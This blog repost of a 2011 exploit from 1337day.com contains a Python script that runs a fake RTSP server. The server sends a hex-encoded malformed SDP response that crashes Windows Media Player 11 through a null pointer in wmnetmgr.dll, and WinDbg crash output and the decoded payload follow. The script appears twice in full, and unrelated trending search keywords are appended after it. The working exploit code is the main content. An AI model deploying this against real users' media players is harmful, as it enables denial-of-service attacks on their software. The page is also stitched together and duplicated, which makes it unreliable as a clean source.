import socket, binascii print "\n" print "----------------------------------------------------------------" print "| WMP11 Remote Null Pointer |" print "| Level, Smash the Stack |" print "| Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |" print "| Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262 |" print "----------------------------------------------------------------" print "\n" print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n" HOST = "127.0.0.1" PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) buf = [ ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746" "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643" "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683" "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474" "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310" "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206" "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7" "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636" "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726" "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205" "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363" "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7" "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7" "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0" "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393" "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494" "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746" "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7" "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707" "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414" "1414141414c784141414141414141414141414141414141414141664141414141414141414843677" "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414" "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414" "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707" "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415" "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414" "1414141414141414151414141414141514145414150414141414141414141416b516663743765707" "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415" "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414" "1414149414141414167414141414141595145424145416641414151414141414151415141416f414" "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676" "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316" "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414" "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414" "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7" "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0" "a0d0a") ] while True: conn, addr = s.accept() print "-----Request From Client-----\n" print conn.recv(1024) print "-----Request From Client-----\n" print "-----Response From Server-----\n" print binascii.unhexlify(buf[0]) print "-----Response From Server-----\n" conn.send(binascii.unhexlify(buf[0])) conn.close() s.close() #CRASH #(ae8.5b8): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll - #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #0:021> g #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!) #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #PAYLOAD# #RTSP/1.0 208 OK #Content-Type: application/sdp #Vary: Accept #X-Playlist-Gen-Id: 176 #X-Broadcast-Id: 0 #Content-Length: 879 #Date: Sun, 08 May 2011 15:24:33 GMT #CSeq: 1 #Server: WMServer/9.1.1.3841 #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT #Etag: "168" #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split #v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1 #s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable # 1337day.com [2011-12-24]
import socket, binascii print "\n" print "----------------------------------------------------------------" print "| WMP11 Remote Null Pointer |" print "| Level, Smash the Stack |" print "| Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |" print "| Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262 |" print "----------------------------------------------------------------" print "\n" print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n" HOST = "127.0.0.1" PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) buf = [ ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746" "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643" "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683" "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474" "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310" "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206" "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7" "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636" "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726" "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205" "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363" "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7" "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7" "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0" "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393" "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494" "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746" "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7" "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707" "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414" "1414141414c784141414141414141414141414141414141414141664141414141414141414843677" "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414" "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414" "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707" "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415" "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414" "1414141414141414151414141414141514145414150414141414141414141416b516663743765707" "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415" "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414" "1414149414141414167414141414141595145424145416641414151414141414151415141416f414" "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676" "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316" "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414" "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414" "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7" "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0" "a0d0a") ] while True: conn, addr = s.accept() print "-----Request From Client-----\n" print conn.recv(1024) print "-----Request From Client-----\n" print "-----Response From Server-----\n" print binascii.unhexlify(buf[0]) print "-----Response From Server-----\n" conn.send(binascii.unhexlify(buf[0])) conn.close() s.close() #CRASH #(ae8.5b8): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll - #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #0:021> g #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!) #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #PAYLOAD# #RTSP/1.0 208 OK #Content-Type: application/sdp #Vary: Accept #X-Playlist-Gen-Id: 176 #X-Broadcast-Id: 0 #Content-Length: 879 #Date: Sun, 08 May 2011 15:24:33 GMT #CSeq: 1 #Server: WMServer/9.1.1.3841 #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT #Etag: "168" #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split #v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1 #s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable # 1337day.com [2011-12-24]
Source: http://www.1337day.com/exploits/17302
kindle fire update college board pasco county rooney mara solstice x factor results x factor results
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.